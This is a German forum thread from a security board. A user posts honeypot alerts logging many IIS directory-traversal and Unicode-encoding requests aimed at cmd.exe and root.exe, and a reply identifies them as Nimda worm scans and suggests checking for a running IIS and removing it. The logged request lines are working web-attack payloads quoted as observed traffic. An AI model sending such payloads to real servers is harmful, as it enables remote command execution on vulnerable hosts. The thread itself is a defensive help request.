Viren, Spyware, Datenschutz 11.215 Themen, 94.210 Beiträge

Meldungen von NFR Back Officer Friendly

fbe / 9 Antworten / Flachansicht Nickles

Ich habe auf meienm Rechner (W98)NFR installiert. Seitdem ich auf einer 2. Partition W2000 laufen habe bekomme ich, wenn ich unter W98 im Internet bin, die folgenden Meldungen von NFR:
Sun Oct 21 16:21:57 HTTP request from 62.158.220.148: GET /scripts/root.exe?/c+dir
Sun Oct 21 16:22:00 HTTP request from 62.158.220.148: GET /MSADC/root.exe?/c+dir
Sun Oct 21 16:22:01 HTTP request from 62.158.220.148: GET /c/winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:22:02 HTTP request from 62.158.220.148: GET /d/winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:22:02 HTTP request from 62.158.220.148: GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:22:03 HTTP request from 62.158.220.148: GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:22:05 HTTP request from 62.158.220.148: GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:22:06 HTTP request from 62.158.220.148: GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:22:07 HTTP request from 62.158.220.148: GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:22:07 HTTP request from 62.158.220.148: GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:22:09 HTTP request from 62.158.220.148: GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:22:10 HTTP request from 62.158.220.148: GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:22:11 HTTP request from 62.158.220.148: GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:22:12 HTTP request from 62.158.220.148: GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:22:14 HTTP request from 62.158.220.148: GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:22:16 HTTP request from 62.158.220.148: GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:27:57 HTTP request from 62.95.18.50: GET /scripts/root.exe?/c+dir
Sun Oct 21 16:27:59 HTTP request from 62.95.18.50: GET /MSADC/root.exe?/c+dir
Sun Oct 21 16:28:03 HTTP request from 62.95.18.50: GET /c/winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:28:08 HTTP request from 62.95.18.50: GET /d/winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:28:08 HTTP request from 62.95.18.50: GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:28:09 HTTP request from 62.95.18.50: GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:28:14 HTTP request from 62.95.18.50: GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:28:15 HTTP request from 62.95.18.50: GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:28:17 HTTP request from 62.95.18.50: GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:28:18 HTTP request from 62.95.18.50: GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:28:19 HTTP request from 62.95.18.50: GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:28:24 HTTP request from 62.95.18.50: GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:28:28 HTTP request from 62.95.18.50: GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:28:29 HTTP request from 62.95.18.50: GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:28:30 HTTP request from 62.95.18.50: GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:28:31 HTTP request from 62.95.18.50: GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir

Weiß jemand was die Meldungen zu bedeuten haben??

Vielen Dank
Fbe

bei Antwort benachrichtigen
;o) fbe „Meldungen von NFR Back Officer Friendly“
Optionen

ich vermute mal, daß du mit win2000 den iis mitinstalliert hast, da nimda netzbereiche nach webservern abscannt und bei denen anklopft um sich einzunisten. starte mal win2000, gehe auf start, ausführen, gib cmd ein und in der eingabeaufforderung gin "netstat -a" ein (ohne anführungszeichen). erscheint dort an deiner ip/deinem rechnernamen ein port 80, dann solltest du schleunigst den IIS wieder deinstallieren und mal nach einer root.exe suchen.

bei Antwort benachrichtigen